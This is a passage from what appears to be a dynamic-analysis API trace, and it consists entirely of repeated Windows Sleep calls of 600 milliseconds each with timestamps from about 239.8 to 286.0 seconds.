(dwMilliseconds=0x258) [0239.821] Sleep (dwMilliseconds=0x258) [0239.872] Sleep (dwMilliseconds=0x258) [0239.924] Sleep (dwMilliseconds=0x258) [0239.966] Sleep (dwMilliseconds=0x258) [0240.079] Sleep (dwMilliseconds=0x258) [0240.184] Sleep (dwMilliseconds=0x258) [0240.282] Sleep (dwMilliseconds=0x258) [0240.348] Sleep (dwMilliseconds=0x258) [0240.464] Sleep (dwMilliseconds=0x258) [0240.605] Sleep (dwMilliseconds=0x258) [0240.689] Sleep (dwMilliseconds=0x258) [0240.782] Sleep (dwMilliseconds=0x258) [0240.891] Sleep (dwMilliseconds=0x258) [0240.973] Sleep (dwMilliseconds=0x258) [0240.987] Sleep (dwMilliseconds=0x258) [0241.002] Sleep (dwMilliseconds=0x258) [0241.048] Sleep (dwMilliseconds=0x258) [0241.132] Sleep (dwMilliseconds=0x258) [0241.186] Sleep (dwMilliseconds=0x258) [0241.250] Sleep (dwMilliseconds=0x258) [0241.345] Sleep (dwMilliseconds=0x258) [0241.481] Sleep (dwMilliseconds=0x258) [0241.518] Sleep (dwMilliseconds=0x258) [0241.564] Sleep (dwMilliseconds=0x258) [0241.616] Sleep (dwMilliseconds=0x258) [0241.778] Sleep (dwMilliseconds=0x258) [0241.872] Sleep (dwMilliseconds=0x258) [0241.966] Sleep (dwMilliseconds=0x258) [0242.103] Sleep (dwMilliseconds=0x258) [0242.282] Sleep (dwMilliseconds=0x258) [0242.342] Sleep (dwMilliseconds=0x258) [0242.375] Sleep (dwMilliseconds=0x258) [0242.463] Sleep (dwMilliseconds=0x258) [0242.516] Sleep (dwMilliseconds=0x258) [0242.627] Sleep (dwMilliseconds=0x258) [0242.716] Sleep (dwMilliseconds=0x258) [0242.782] Sleep (dwMilliseconds=0x258) [0242.956] Sleep (dwMilliseconds=0x258) [0243.004] Sleep (dwMilliseconds=0x258) [0243.062] Sleep (dwMilliseconds=0x258) [0243.188] Sleep (dwMilliseconds=0x258) [0243.281] Sleep (dwMilliseconds=0x258) [0243.376] Sleep (dwMilliseconds=0x258) [0243.428] Sleep (dwMilliseconds=0x258) [0243.504] Sleep (dwMilliseconds=0x258) [0243.635] Sleep (dwMilliseconds=0x258) [0243.682] Sleep (dwMilliseconds=0x258) [0243.725] Sleep (dwMilliseconds=0x258) [0243.783] Sleep (dwMilliseconds=0x258) [0243.897] Sleep (dwMilliseconds=0x258) [0243.962] Sleep (dwMilliseconds=0x258) [0244.016] Sleep (dwMilliseconds=0x258) [0244.143] Sleep (dwMilliseconds=0x258) [0244.207] Sleep (dwMilliseconds=0x258) [0244.250] Sleep (dwMilliseconds=0x258) [0244.296] Sleep (dwMilliseconds=0x258) [0244.359] Sleep (dwMilliseconds=0x258) [0244.470] Sleep (dwMilliseconds=0x258) [0244.579] Sleep (dwMilliseconds=0x258) [0244.672] Sleep (dwMilliseconds=0x258) [0244.763] Sleep (dwMilliseconds=0x258) [0244.783] Sleep (dwMilliseconds=0x258) [0244.827] Sleep (dwMilliseconds=0x258) [0244.846] Sleep (dwMilliseconds=0x258) [0244.858] Sleep (dwMilliseconds=0x258) [0244.963] Sleep (dwMilliseconds=0x258) [0245.061] Sleep (dwMilliseconds=0x258) [0245.172] Sleep (dwMilliseconds=0x258) [0245.309] Sleep (dwMilliseconds=0x258) [0245.345] Sleep (dwMilliseconds=0x258) [0245.436] Sleep (dwMilliseconds=0x258) [0245.498] Sleep (dwMilliseconds=0x258) [0245.626] Sleep (dwMilliseconds=0x258) [0245.700] Sleep (dwMilliseconds=0x258) [0245.798] Sleep (dwMilliseconds=0x258) [0245.888] Sleep (dwMilliseconds=0x258) [0245.972] Sleep (dwMilliseconds=0x258) [0246.033] Sleep (dwMilliseconds=0x258) [0246.117] Sleep (dwMilliseconds=0x258) [0246.173] Sleep (dwMilliseconds=0x258) [0246.199] Sleep (dwMilliseconds=0x258) [0246.233] Sleep (dwMilliseconds=0x258) [0246.329] Sleep (dwMilliseconds=0x258) [0246.408] Sleep (dwMilliseconds=0x258) [0246.485] Sleep (dwMilliseconds=0x258) [0246.606] Sleep (dwMilliseconds=0x258) [0246.704] Sleep (dwMilliseconds=0x258) [0246.746] Sleep (dwMilliseconds=0x258) [0246.800] Sleep (dwMilliseconds=0x258) [0246.819] Sleep (dwMilliseconds=0x258) [0246.826] Sleep (dwMilliseconds=0x258) [0246.905] Sleep (dwMilliseconds=0x258) [0247.017] Sleep (dwMilliseconds=0x258) [0247.121] Sleep (dwMilliseconds=0x258) [0247.231] Sleep (dwMilliseconds=0x258) [0247.285] Sleep (dwMilliseconds=0x258) [0247.298] Sleep (dwMilliseconds=0x258) [0247.344] Sleep (dwMilliseconds=0x258) [0247.382] Sleep (dwMilliseconds=0x258) [0247.437] Sleep (dwMilliseconds=0x258) [0247.516] Sleep (dwMilliseconds=0x258) [0247.778] Sleep (dwMilliseconds=0x258) [0248.060] Sleep (dwMilliseconds=0x258) [0248.185] Sleep (dwMilliseconds=0x258) [0248.289] Sleep (dwMilliseconds=0x258) [0248.376] Sleep (dwMilliseconds=0x258) [0248.562] Sleep (dwMilliseconds=0x258) [0248.747] Sleep (dwMilliseconds=0x258) [0248.964] Sleep (dwMilliseconds=0x258) [0249.106] Sleep (dwMilliseconds=0x258) [0249.236] Sleep (dwMilliseconds=0x258) [0249.325] Sleep (dwMilliseconds=0x258) [0249.408] Sleep (dwMilliseconds=0x258) [0249.426] Sleep (dwMilliseconds=0x258) [0249.437] Sleep (dwMilliseconds=0x258) [0249.469] Sleep (dwMilliseconds=0x258) [0249.528] Sleep (dwMilliseconds=0x258) [0249.594] Sleep (dwMilliseconds=0x258) [0249.721] Sleep (dwMilliseconds=0x258) [0249.811] Sleep (dwMilliseconds=0x258) [0249.879] Sleep (dwMilliseconds=0x258) [0249.940] Sleep (dwMilliseconds=0x258) [0250.118] Sleep (dwMilliseconds=0x258) [0250.179] Sleep (dwMilliseconds=0x258) [0250.197] Sleep (dwMilliseconds=0x258) [0250.199] Sleep (dwMilliseconds=0x258) [0250.225] Sleep (dwMilliseconds=0x258) [0250.269] Sleep (dwMilliseconds=0x258) [0250.346] Sleep (dwMilliseconds=0x258) [0250.377] Sleep (dwMilliseconds=0x258) [0250.463] Sleep (dwMilliseconds=0x258) [0250.515] Sleep (dwMilliseconds=0x258) [0250.600] Sleep (dwMilliseconds=0x258) [0250.705] Sleep (dwMilliseconds=0x258) [0250.751] Sleep (dwMilliseconds=0x258) [0250.791] Sleep (dwMilliseconds=0x258) [0250.829] Sleep (dwMilliseconds=0x258) [0250.891] Sleep (dwMilliseconds=0x258) [0250.909] Sleep (dwMilliseconds=0x258) [0250.954] Sleep (dwMilliseconds=0x258) [0251.031] Sleep (dwMilliseconds=0x258) [0251.093] Sleep (dwMilliseconds=0x258) [0251.218] Sleep (dwMilliseconds=0x258) [0251.275] Sleep (dwMilliseconds=0x258) [0251.367] Sleep (dwMilliseconds=0x258) [0251.416] Sleep (dwMilliseconds=0x258) [0251.451] Sleep (dwMilliseconds=0x258) [0251.491] Sleep (dwMilliseconds=0x258) [0251.540] Sleep (dwMilliseconds=0x258) [0251.588] Sleep (dwMilliseconds=0x258) [0251.595] Sleep (dwMilliseconds=0x258) [0251.674] Sleep (dwMilliseconds=0x258) [0251.766] Sleep (dwMilliseconds=0x258) [0251.877] Sleep (dwMilliseconds=0x258) [0251.954] Sleep (dwMilliseconds=0x258) [0252.018] Sleep (dwMilliseconds=0x258) [0252.125] Sleep (dwMilliseconds=0x258) [0252.216] Sleep (dwMilliseconds=0x258) [0252.271] Sleep (dwMilliseconds=0x258) [0252.325] Sleep (dwMilliseconds=0x258) [0252.346] Sleep (dwMilliseconds=0x258) [0252.359] Sleep (dwMilliseconds=0x258) [0252.455] Sleep (dwMilliseconds=0x258) [0252.560] Sleep (dwMilliseconds=0x258) [0252.625] Sleep (dwMilliseconds=0x258) [0252.731] Sleep (dwMilliseconds=0x258) [0252.828] Sleep (dwMilliseconds=0x258) [0252.906] Sleep (dwMilliseconds=0x258) [0253.005] Sleep (dwMilliseconds=0x258) [0253.111] Sleep (dwMilliseconds=0x258) [0253.304] Sleep (dwMilliseconds=0x258) [0253.430] Sleep (dwMilliseconds=0x258) [0253.702] Sleep (dwMilliseconds=0x258) [0253.780] Sleep (dwMilliseconds=0x258) [0253.874] Sleep (dwMilliseconds=0x258) [0253.928] Sleep (dwMilliseconds=0x258) [0253.946] Sleep (dwMilliseconds=0x258) [0253.981] Sleep (dwMilliseconds=0x258) [0254.017] Sleep (dwMilliseconds=0x258) [0254.028] Sleep (dwMilliseconds=0x258) [0254.045] Sleep (dwMilliseconds=0x258) [0254.091] Sleep (dwMilliseconds=0x258) [0254.162] Sleep (dwMilliseconds=0x258) [0254.216] Sleep (dwMilliseconds=0x258) [0254.298] Sleep (dwMilliseconds=0x258) [0254.387] Sleep (dwMilliseconds=0x258) [0254.456] Sleep (dwMilliseconds=0x258) [0254.510] Sleep (dwMilliseconds=0x258) [0254.564] Sleep (dwMilliseconds=0x258) [0254.584] Sleep (dwMilliseconds=0x258) [0254.590] Sleep (dwMilliseconds=0x258) [0254.625] Sleep (dwMilliseconds=0x258) [0254.782] Sleep (dwMilliseconds=0x258) [0254.841] Sleep (dwMilliseconds=0x258) [0254.944] Sleep (dwMilliseconds=0x258) [0255.047] Sleep (dwMilliseconds=0x258) [0255.094] Sleep (dwMilliseconds=0x258) [0255.120] Sleep (dwMilliseconds=0x258) [0255.173] Sleep (dwMilliseconds=0x258) [0255.246] Sleep (dwMilliseconds=0x258) [0255.297] Sleep (dwMilliseconds=0x258) [0255.388] Sleep (dwMilliseconds=0x258) [0255.470] Sleep (dwMilliseconds=0x258) [0255.530] Sleep (dwMilliseconds=0x258) [0255.592] Sleep (dwMilliseconds=0x258) [0255.614] Sleep (dwMilliseconds=0x258) [0255.625] Sleep (dwMilliseconds=0x258) [0255.685] Sleep (dwMilliseconds=0x258) [0255.783] Sleep (dwMilliseconds=0x258) [0255.840] Sleep (dwMilliseconds=0x258) [0256.032] Sleep (dwMilliseconds=0x258) [0256.267] Sleep (dwMilliseconds=0x258) [0256.376] Sleep (dwMilliseconds=0x258) [0256.450] Sleep (dwMilliseconds=0x258) [0256.730] Sleep (dwMilliseconds=0x258) [0256.863] Sleep (dwMilliseconds=0x258) [0257.031] Sleep (dwMilliseconds=0x258) [0257.148] Sleep (dwMilliseconds=0x258) [0257.280] Sleep (dwMilliseconds=0x258) [0257.392] Sleep (dwMilliseconds=0x258) [0257.467] Sleep (dwMilliseconds=0x258) [0257.737] Sleep (dwMilliseconds=0x258) [0257.894] Sleep (dwMilliseconds=0x258) [0257.947] Sleep (dwMilliseconds=0x258) [0257.992] Sleep (dwMilliseconds=0x258) [0258.028] Sleep (dwMilliseconds=0x258) [0258.065] Sleep (dwMilliseconds=0x258) [0258.110] Sleep (dwMilliseconds=0x258) [0258.153] Sleep (dwMilliseconds=0x258) [0258.204] Sleep (dwMilliseconds=0x258) [0258.345] Sleep (dwMilliseconds=0x258) [0258.390] Sleep (dwMilliseconds=0x258) [0258.490] Sleep (dwMilliseconds=0x258) [0258.578] Sleep (dwMilliseconds=0x258) [0258.627] Sleep (dwMilliseconds=0x258) [0258.700] Sleep (dwMilliseconds=0x258) [0258.750] Sleep (dwMilliseconds=0x258) [0258.828] Sleep (dwMilliseconds=0x258) [0258.858] Sleep (dwMilliseconds=0x258) [0258.937] Sleep (dwMilliseconds=0x258) [0259.007] Sleep (dwMilliseconds=0x258) [0259.121] Sleep (dwMilliseconds=0x258) [0259.220] Sleep (dwMilliseconds=0x258) [0259.302] Sleep (dwMilliseconds=0x258) [0259.357] Sleep (dwMilliseconds=0x258) [0259.419] Sleep (dwMilliseconds=0x258) [0259.439] Sleep (dwMilliseconds=0x258) [0259.590] Sleep (dwMilliseconds=0x258) [0259.673] Sleep (dwMilliseconds=0x258) [0259.726] Sleep (dwMilliseconds=0x258) [0259.780] Sleep (dwMilliseconds=0x258) [0259.857] Sleep (dwMilliseconds=0x258) [0259.947] Sleep (dwMilliseconds=0x258) [0259.969] Sleep (dwMilliseconds=0x258) [0260.078] Sleep (dwMilliseconds=0x258) [0260.113] Sleep (dwMilliseconds=0x258) [0260.157] Sleep (dwMilliseconds=0x258) [0260.234] Sleep (dwMilliseconds=0x258) [0260.296] Sleep (dwMilliseconds=0x258) [0260.400] Sleep (dwMilliseconds=0x258) [0260.486] Sleep (dwMilliseconds=0x258) [0260.531] Sleep (dwMilliseconds=0x258) [0260.583] Sleep (dwMilliseconds=0x258) [0260.625] Sleep (dwMilliseconds=0x258) [0260.707] Sleep (dwMilliseconds=0x258) [0260.783] Sleep (dwMilliseconds=0x258) [0260.934] Sleep (dwMilliseconds=0x258) [0260.998] Sleep (dwMilliseconds=0x258) [0261.060] Sleep (dwMilliseconds=0x258) [0261.157] Sleep (dwMilliseconds=0x258) [0261.246] Sleep (dwMilliseconds=0x258) [0261.307] Sleep (dwMilliseconds=0x258) [0261.345] Sleep (dwMilliseconds=0x258) [0261.389] Sleep (dwMilliseconds=0x258) [0261.470] Sleep (dwMilliseconds=0x258) [0261.516] Sleep (dwMilliseconds=0x258) [0261.607] Sleep (dwMilliseconds=0x258) [0261.690] Sleep (dwMilliseconds=0x258) [0261.763] Sleep (dwMilliseconds=0x258) [0261.826] Sleep (dwMilliseconds=0x258) [0261.938] Sleep (dwMilliseconds=0x258) [0261.983] Sleep (dwMilliseconds=0x258) [0262.060] Sleep (dwMilliseconds=0x258) [0262.148] Sleep (dwMilliseconds=0x258) [0262.231] Sleep (dwMilliseconds=0x258) [0262.299] Sleep (dwMilliseconds=0x258) [0262.311] Sleep (dwMilliseconds=0x258) [0262.359] Sleep (dwMilliseconds=0x258) [0262.381] Sleep (dwMilliseconds=0x258) [0262.389] Sleep (dwMilliseconds=0x258) [0262.450] Sleep (dwMilliseconds=0x258) [0262.545] Sleep (dwMilliseconds=0x258) [0262.638] Sleep (dwMilliseconds=0x258) [0262.800] Sleep (dwMilliseconds=0x258) [0262.868] Sleep (dwMilliseconds=0x258) [0262.902] Sleep (dwMilliseconds=0x258) [0262.925] Sleep (dwMilliseconds=0x258) [0262.968] Sleep (dwMilliseconds=0x258) [0263.081] Sleep (dwMilliseconds=0x258) [0263.204] Sleep (dwMilliseconds=0x258) [0263.299] Sleep (dwMilliseconds=0x258) [0263.349] Sleep (dwMilliseconds=0x258) [0263.408] Sleep (dwMilliseconds=0x258) [0263.492] Sleep (dwMilliseconds=0x258) [0263.544] Sleep (dwMilliseconds=0x258) [0263.559] Sleep (dwMilliseconds=0x258) [0263.687] Sleep (dwMilliseconds=0x258) [0263.827] Sleep (dwMilliseconds=0x258) [0263.979] Sleep (dwMilliseconds=0x258) [0264.083] Sleep (dwMilliseconds=0x258) [0264.188] Sleep (dwMilliseconds=0x258) [0264.300] Sleep (dwMilliseconds=0x258) [0264.387] Sleep (dwMilliseconds=0x258) [0264.421] Sleep (dwMilliseconds=0x258) [0264.435] Sleep (dwMilliseconds=0x258) [0264.451] Sleep (dwMilliseconds=0x258) [0264.498] Sleep (dwMilliseconds=0x258) [0264.568] Sleep (dwMilliseconds=0x258) [0264.607] Sleep (dwMilliseconds=0x258) [0264.683] Sleep (dwMilliseconds=0x258) [0264.780] Sleep (dwMilliseconds=0x258) [0264.861] Sleep (dwMilliseconds=0x258) [0264.948] Sleep (dwMilliseconds=0x258) [0265.017] Sleep (dwMilliseconds=0x258) [0265.064] Sleep (dwMilliseconds=0x258) [0265.109] Sleep (dwMilliseconds=0x258) [0265.172] Sleep (dwMilliseconds=0x258) [0265.263] Sleep (dwMilliseconds=0x258) [0265.360] Sleep (dwMilliseconds=0x258) [0265.559] Sleep (dwMilliseconds=0x258) [0265.613] Sleep (dwMilliseconds=0x258) [0265.661] Sleep (dwMilliseconds=0x258) [0265.787] Sleep (dwMilliseconds=0x258) [0265.855] Sleep (dwMilliseconds=0x258) [0265.923] Sleep (dwMilliseconds=0x258) [0266.029] Sleep (dwMilliseconds=0x258) [0266.126] Sleep (dwMilliseconds=0x258) [0266.203] Sleep (dwMilliseconds=0x258) [0266.230] Sleep (dwMilliseconds=0x258) [0266.273] Sleep (dwMilliseconds=0x258) [0266.329] Sleep (dwMilliseconds=0x258) [0266.370] Sleep (dwMilliseconds=0x258) [0266.411] Sleep (dwMilliseconds=0x258) [0266.438] Sleep (dwMilliseconds=0x258) [0266.450] Sleep (dwMilliseconds=0x258) [0266.484] Sleep (dwMilliseconds=0x258) [0266.524] Sleep (dwMilliseconds=0x258) [0266.577] Sleep (dwMilliseconds=0x258) [0266.617] Sleep (dwMilliseconds=0x258) [0266.692] Sleep (dwMilliseconds=0x258) [0266.762] Sleep (dwMilliseconds=0x258) [0266.806] Sleep (dwMilliseconds=0x258) [0266.856] Sleep (dwMilliseconds=0x258) [0266.913] Sleep (dwMilliseconds=0x258) [0266.925] Sleep (dwMilliseconds=0x258) [0267.022] Sleep (dwMilliseconds=0x258) [0267.070] Sleep (dwMilliseconds=0x258) [0267.098] Sleep (dwMilliseconds=0x258) [0267.165] Sleep (dwMilliseconds=0x258) [0267.217] Sleep (dwMilliseconds=0x258) [0267.298] Sleep (dwMilliseconds=0x258) [0267.388] Sleep (dwMilliseconds=0x258) [0267.456] Sleep (dwMilliseconds=0x258) [0267.534] Sleep (dwMilliseconds=0x258) [0267.611] Sleep (dwMilliseconds=0x258) [0267.631] Sleep (dwMilliseconds=0x258) [0267.638] Sleep (dwMilliseconds=0x258) [0267.671] Sleep (dwMilliseconds=0x258) [0267.767] Sleep (dwMilliseconds=0x258) [0267.924] Sleep (dwMilliseconds=0x258) [0268.032] Sleep (dwMilliseconds=0x258) [0268.171] Sleep (dwMilliseconds=0x258) [0268.263] Sleep (dwMilliseconds=0x258) [0268.341] Sleep (dwMilliseconds=0x258) [0268.378] Sleep (dwMilliseconds=0x258) [0268.419] Sleep (dwMilliseconds=0x258) [0268.485] Sleep (dwMilliseconds=0x258) [0268.575] Sleep (dwMilliseconds=0x258) [0268.670] Sleep (dwMilliseconds=0x258) [0268.730] Sleep (dwMilliseconds=0x258) [0268.783] Sleep (dwMilliseconds=0x258) [0268.840] Sleep (dwMilliseconds=0x258) [0268.906] Sleep (dwMilliseconds=0x258) [0269.059] Sleep (dwMilliseconds=0x258) [0269.128] Sleep (dwMilliseconds=0x258) [0269.234] Sleep (dwMilliseconds=0x258) [0269.301] Sleep (dwMilliseconds=0x258) [0269.332] Sleep (dwMilliseconds=0x258) [0269.342] Sleep (dwMilliseconds=0x258) [0269.356] Sleep (dwMilliseconds=0x258) [0269.409] Sleep (dwMilliseconds=0x258) [0269.497] Sleep (dwMilliseconds=0x258) [0269.596] Sleep (dwMilliseconds=0x258) [0269.687] Sleep (dwMilliseconds=0x258) [0269.776] Sleep (dwMilliseconds=0x258) [0269.841] Sleep (dwMilliseconds=0x258) [0269.931] Sleep (dwMilliseconds=0x258) [0270.052] Sleep (dwMilliseconds=0x258) [0270.218] Sleep (dwMilliseconds=0x258) [0270.323] Sleep (dwMilliseconds=0x258) [0270.391] Sleep (dwMilliseconds=0x258) [0270.472] Sleep (dwMilliseconds=0x258) [0270.564] Sleep (dwMilliseconds=0x258) [0270.610] Sleep (dwMilliseconds=0x258) [0270.622] Sleep (dwMilliseconds=0x258) [0270.673] Sleep (dwMilliseconds=0x258) [0270.693] Sleep (dwMilliseconds=0x258) [0270.702] Sleep (dwMilliseconds=0x258) [0270.762] Sleep (dwMilliseconds=0x258) [0270.868] Sleep (dwMilliseconds=0x258) [0270.934] Sleep (dwMilliseconds=0x258) [0271.031] Sleep (dwMilliseconds=0x258) [0271.081] Sleep (dwMilliseconds=0x258) [0271.099] Sleep (dwMilliseconds=0x258) [0271.145] Sleep (dwMilliseconds=0x258) [0271.180] Sleep (dwMilliseconds=0x258) [0271.231] Sleep (dwMilliseconds=0x258) [0271.299] Sleep (dwMilliseconds=0x258) [0271.466] Sleep (dwMilliseconds=0x258) [0271.582] Sleep (dwMilliseconds=0x258) [0271.671] Sleep (dwMilliseconds=0x258) [0271.777] Sleep (dwMilliseconds=0x258) [0271.832] Sleep (dwMilliseconds=0x258) [0271.874] Sleep (dwMilliseconds=0x258) [0271.932] Sleep (dwMilliseconds=0x258) [0272.001] Sleep (dwMilliseconds=0x258) [0272.093] Sleep (dwMilliseconds=0x258) [0272.185] Sleep (dwMilliseconds=0x258) [0272.265] Sleep (dwMilliseconds=0x258) [0272.338] Sleep (dwMilliseconds=0x258) [0272.345] Sleep (dwMilliseconds=0x258) [0272.390] Sleep (dwMilliseconds=0x258) [0272.440] Sleep (dwMilliseconds=0x258) [0272.611] Sleep (dwMilliseconds=0x258) [0272.761] Sleep (dwMilliseconds=0x258) [0272.869] Sleep (dwMilliseconds=0x258) [0272.977] Sleep (dwMilliseconds=0x258) [0272.987] Sleep (dwMilliseconds=0x258) [0273.059] Sleep (dwMilliseconds=0x258) [0273.106] Sleep (dwMilliseconds=0x258) [0273.159] Sleep (dwMilliseconds=0x258) [0273.216] Sleep (dwMilliseconds=0x258) [0273.270] Sleep (dwMilliseconds=0x258) [0273.317] Sleep (dwMilliseconds=0x258) [0273.328] Sleep (dwMilliseconds=0x258) [0273.393] Sleep (dwMilliseconds=0x258) [0273.436] Sleep (dwMilliseconds=0x258) [0273.481] Sleep (dwMilliseconds=0x258) [0273.561] Sleep (dwMilliseconds=0x258) [0273.657] Sleep (dwMilliseconds=0x258) [0273.768] Sleep (dwMilliseconds=0x258) [0273.861] Sleep (dwMilliseconds=0x258) [0273.901] Sleep (dwMilliseconds=0x258) [0273.905] Sleep (dwMilliseconds=0x258) [0273.951] Sleep (dwMilliseconds=0x258) [0273.998] Sleep (dwMilliseconds=0x258) [0274.149] Sleep (dwMilliseconds=0x258) [0274.226] Sleep (dwMilliseconds=0x258) [0274.270] Sleep (dwMilliseconds=0x258) [0274.313] Sleep (dwMilliseconds=0x258) [0274.350] Sleep (dwMilliseconds=0x258) [0274.397] Sleep (dwMilliseconds=0x258) [0274.469] Sleep (dwMilliseconds=0x258) [0274.516] Sleep (dwMilliseconds=0x258) [0274.563] Sleep (dwMilliseconds=0x258) [0274.594] Sleep (dwMilliseconds=0x258) [0274.624] Sleep (dwMilliseconds=0x258) [0274.721] Sleep (dwMilliseconds=0x258) [0274.798] Sleep (dwMilliseconds=0x258) [0274.892] Sleep (dwMilliseconds=0x258) [0275.108] Sleep (dwMilliseconds=0x258) [0275.218] Sleep (dwMilliseconds=0x258) [0275.261] Sleep (dwMilliseconds=0x258) [0275.280] Sleep (dwMilliseconds=0x258) [0275.329] Sleep (dwMilliseconds=0x258) [0275.344] Sleep (dwMilliseconds=0x258) [0275.397] Sleep (dwMilliseconds=0x258) [0275.486] Sleep (dwMilliseconds=0x258) [0275.580] Sleep (dwMilliseconds=0x258) [0275.696] Sleep (dwMilliseconds=0x258) [0275.812] Sleep (dwMilliseconds=0x258) [0275.830] Sleep (dwMilliseconds=0x258) [0275.876] Sleep (dwMilliseconds=0x258) [0275.908] Sleep (dwMilliseconds=0x258) [0275.972] Sleep (dwMilliseconds=0x258) [0276.079] Sleep (dwMilliseconds=0x258) [0276.199] Sleep (dwMilliseconds=0x258) [0276.268] Sleep (dwMilliseconds=0x258) [0276.342] Sleep (dwMilliseconds=0x258) [0276.406] Sleep (dwMilliseconds=0x258) [0276.454] Sleep (dwMilliseconds=0x258) [0276.499] Sleep (dwMilliseconds=0x258) [0276.594] Sleep (dwMilliseconds=0x258) [0276.701] Sleep (dwMilliseconds=0x258) [0276.767] Sleep (dwMilliseconds=0x258) [0276.860] Sleep (dwMilliseconds=0x258) [0276.924] Sleep (dwMilliseconds=0x258) [0276.939] Sleep (dwMilliseconds=0x258) [0276.986] Sleep (dwMilliseconds=0x258) [0277.020] Sleep (dwMilliseconds=0x258) [0277.094] Sleep (dwMilliseconds=0x258) [0277.172] Sleep (dwMilliseconds=0x258) [0277.266] Sleep (dwMilliseconds=0x258) [0277.392] Sleep (dwMilliseconds=0x258) [0277.432] Sleep (dwMilliseconds=0x258) [0277.479] Sleep (dwMilliseconds=0x258) [0277.488] Sleep (dwMilliseconds=0x258) [0277.531] Sleep (dwMilliseconds=0x258) [0277.576] Sleep (dwMilliseconds=0x258) [0277.671] Sleep (dwMilliseconds=0x258) [0277.754] Sleep (dwMilliseconds=0x258) [0277.797] Sleep (dwMilliseconds=0x258) [0277.861] Sleep (dwMilliseconds=0x258) [0277.953] Sleep (dwMilliseconds=0x258) [0278.026] Sleep (dwMilliseconds=0x258) [0278.028] Sleep (dwMilliseconds=0x258) [0278.070] Sleep (dwMilliseconds=0x258) [0278.155] Sleep (dwMilliseconds=0x258) [0278.251] Sleep (dwMilliseconds=0x258) [0278.343] Sleep (dwMilliseconds=0x258) [0278.440] Sleep (dwMilliseconds=0x258) [0278.597] Sleep (dwMilliseconds=0x258) [0278.689] Sleep (dwMilliseconds=0x258) [0278.769] Sleep (dwMilliseconds=0x258) [0278.812] Sleep (dwMilliseconds=0x258) [0278.825] Sleep (dwMilliseconds=0x258) [0278.878] Sleep (dwMilliseconds=0x258) [0278.951] Sleep (dwMilliseconds=0x258) [0279.001] Sleep (dwMilliseconds=0x258) [0279.122] Sleep (dwMilliseconds=0x258) [0279.298] Sleep (dwMilliseconds=0x258) [0279.390] Sleep (dwMilliseconds=0x258) [0279.484] Sleep (dwMilliseconds=0x258) [0279.607] Sleep (dwMilliseconds=0x258) [0279.733] Sleep (dwMilliseconds=0x258) [0279.903] Sleep (dwMilliseconds=0x258) [0280.003] Sleep (dwMilliseconds=0x258) [0280.043] Sleep (dwMilliseconds=0x258) [0280.064] Sleep (dwMilliseconds=0x258) [0280.122] Sleep (dwMilliseconds=0x258) [0280.159] Sleep (dwMilliseconds=0x258) [0280.200] Sleep (dwMilliseconds=0x258) [0280.265] Sleep (dwMilliseconds=0x258) [0280.357] Sleep (dwMilliseconds=0x258) [0280.436] Sleep (dwMilliseconds=0x258) [0280.466] Sleep (dwMilliseconds=0x258) [0280.483] Sleep (dwMilliseconds=0x258) [0280.609] Sleep (dwMilliseconds=0x258) [0280.734] Sleep (dwMilliseconds=0x258) [0280.838] Sleep (dwMilliseconds=0x258) [0280.953] Sleep (dwMilliseconds=0x258) [0281.059] Sleep (dwMilliseconds=0x258) [0281.159] Sleep (dwMilliseconds=0x258) [0281.173] Sleep (dwMilliseconds=0x258) [0281.184] Sleep (dwMilliseconds=0x258) [0281.236] Sleep (dwMilliseconds=0x258) [0281.276] Sleep (dwMilliseconds=0x258) [0281.327] Sleep (dwMilliseconds=0x258) [0281.421] Sleep (dwMilliseconds=0x258) [0281.502] Sleep (dwMilliseconds=0x258) [0281.616] Sleep (dwMilliseconds=0x258) [0281.720] Sleep (dwMilliseconds=0x258) [0281.782] Sleep (dwMilliseconds=0x258) [0281.817] Sleep (dwMilliseconds=0x258) [0281.878] Sleep (dwMilliseconds=0x258) [0282.153] Sleep (dwMilliseconds=0x258) [0282.208] Sleep (dwMilliseconds=0x258) [0282.317] Sleep (dwMilliseconds=0x258) [0282.425] Sleep (dwMilliseconds=0x258) [0282.516] Sleep (dwMilliseconds=0x258) [0282.587] Sleep (dwMilliseconds=0x258) [0282.641] Sleep (dwMilliseconds=0x258) [0282.715] Sleep (dwMilliseconds=0x258) [0282.768] Sleep (dwMilliseconds=0x258) [0282.821] Sleep (dwMilliseconds=0x258) [0282.908] Sleep (dwMilliseconds=0x258) [0283.002] Sleep (dwMilliseconds=0x258) [0283.095] Sleep (dwMilliseconds=0x258) [0283.188] Sleep (dwMilliseconds=0x258) [0283.393] Sleep (dwMilliseconds=0x258) [0283.454] Sleep (dwMilliseconds=0x258) [0283.501] Sleep (dwMilliseconds=0x258) [0283.593] Sleep (dwMilliseconds=0x258) [0283.689] Sleep (dwMilliseconds=0x258) [0283.782] Sleep (dwMilliseconds=0x258) [0283.832] Sleep (dwMilliseconds=0x258) [0283.876] Sleep (dwMilliseconds=0x258) [0283.937] Sleep (dwMilliseconds=0x258) [0283.972] Sleep (dwMilliseconds=0x258) [0283.984] Sleep (dwMilliseconds=0x258) [0284.001] Sleep (dwMilliseconds=0x258) [0284.047] Sleep (dwMilliseconds=0x258) [0284.113] Sleep (dwMilliseconds=0x258) [0284.191] Sleep (dwMilliseconds=0x258) [0284.298] Sleep (dwMilliseconds=0x258) [0284.406] Sleep (dwMilliseconds=0x258) [0284.512] Sleep (dwMilliseconds=0x258) [0284.540] Sleep (dwMilliseconds=0x258) [0284.545] Sleep (dwMilliseconds=0x258) [0284.560] Sleep (dwMilliseconds=0x258) [0284.610] Sleep (dwMilliseconds=0x258) [0284.625] Sleep (dwMilliseconds=0x258) [0284.672] Sleep (dwMilliseconds=0x258) [0284.767] Sleep (dwMilliseconds=0x258) [0284.845] Sleep (dwMilliseconds=0x258) [0284.907] Sleep (dwMilliseconds=0x258) [0285.004] Sleep (dwMilliseconds=0x258) [0285.033] Sleep (dwMilliseconds=0x258) [0285.044] Sleep (dwMilliseconds=0x258) [0285.062] Sleep (dwMilliseconds=0x258) [0285.108] Sleep (dwMilliseconds=0x258) [0285.123] Sleep (dwMilliseconds=0x258) [0285.187] Sleep (dwMilliseconds=0x258) [0285.264] Sleep (dwMilliseconds=0x258) [0285.373] Sleep (dwMilliseconds=0x258) [0285.436] Sleep (dwMilliseconds=0x258) [0285.515] Sleep (dwMilliseconds=0x258) [0285.622] Sleep (dwMilliseconds=0x258) [0285.707] Sleep (dwMilliseconds=0x258) [0285.718] Sleep (dwMilliseconds=0x258) [0285.752] Sleep (dwMilliseconds=0x258) [0285.891] Sleep (dwMilliseconds=0x258) [0285.943] Sleep (dwMilliseconds=0x258) [0286.001] Sleep (dwMilliseconds=0x258) [0286.092] 